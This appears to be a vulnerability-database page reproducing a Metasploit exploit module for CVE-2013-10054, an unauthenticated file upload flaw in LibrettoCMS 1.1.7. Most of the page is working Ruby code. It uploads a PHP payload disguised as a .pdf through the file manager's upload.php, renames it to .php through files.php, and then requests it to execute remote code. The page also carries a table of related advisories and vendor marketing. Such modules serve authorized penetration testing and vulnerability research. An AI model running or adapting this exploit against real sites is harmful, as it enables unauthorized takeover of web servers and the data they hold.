LibrettoCMS File Manager Arbitary File Upload Vulnerability
🗓️ 14 Jun 2013 00:00:00Reported by CWH, sinn3r <[email protected]>Type
metasploit🔗 www.rapid7.com👁 13 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2013-10054 | 29 May 201815:50 | – | circl | |
| Sourceforge LibrettoCMS 安全漏洞 | 4 Aug 202500:00 | – | cnnvd | |
| CVE-2013-10054 | 4 Aug 202518:04 | – | cve | |
| CVE-2013-10054 LibrettoCMS File Manager Arbitrary File Upload | 4 Aug 202518:04 | – | cvelist | |
| EUVD-2013-7276 | 7 Oct 202500:30 | – | euvd | |
| CVE-2013-10054 | 4 Aug 202518:15 | – | nvd | |
| PT-2025-31843 · Librettocms +1 · File Manager +1 | 4 Aug 202500:00 | – | ptsecurity | |
| CVE-2013-10054 | 6 Aug 202518:32 | – | redhatcve | |
| CVE-2013-10054 LibrettoCMS File Manager Arbitrary File Upload | 4 Aug 202518:04 | – | vulnrichment |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'LibrettoCMS File Manager Arbitary File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and
possibly prior. Attackers can bypass the file extension check and abuse the upload
feature in order to upload a malicious PHP file without authentication, which
results in arbitrary remote code execution.
},
'License' => MSF_LICENSE,
'Author' => [
'CWH',
'sinn3r' # Metasploit
],
'References' => [
['CVE', '2013-10054'],
['OSVDB', '94391'],
['EDB', '26213']
],
'Payload' => {
'BadChars' => "\x00"
},
'Targets' => [
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'Privileged' => false,
'DisclosureDate' => '2013-06-14',
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])
]
)
end
def check
res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })
if !res
vprint_error('Connection timed out')
return Exploit::CheckCode::Unknown('Could not determine the target status')
end
if res.body =~ /Powered by <a href=".+">Libretto CMS/
return Exploit::CheckCode::Detected('The target service was detected')
end
Exploit::CheckCode::Safe('The target is not vulnerable')
end
def upload(base)
p = get_write_exec_payload(unlink_self: true)
fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"
data = Rex::MIME::Message.new
data.add_part(fname, nil, nil, 'form-data; name="Filename"')
data.add_part(p, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")
data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')
post_data = data.to_s
uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'vars_get' => { 'type' => 'all files' }
})
if !res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code}")
end
fname
end
def rename(base, original_fname)
new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"
uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_get' => { 'type' => 'all files' },
'vars_post' => {
'fun' => 'renameFile',
'dir' => '',
'filename' => original_fname,
'newFilename' => new_name
}
})
if !res
fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")
elsif res.body !~ /"res":"OK"/
fail_with(Failure::Unknown, "#{peer} - Failed to rename file")
end
new_name
end
def exec(base, payload_fname)
res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })
if res and res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
print_status('Uploading malicious file...')
orig_fname = upload(base)
print_status("Renaming #{orig_fname}...")
new_fname = rename(base, orig_fname)
print_status("Executing #{new_fname}...")
exec(base, new_fname)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jun 2013 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
EPSS0.01282
SSVC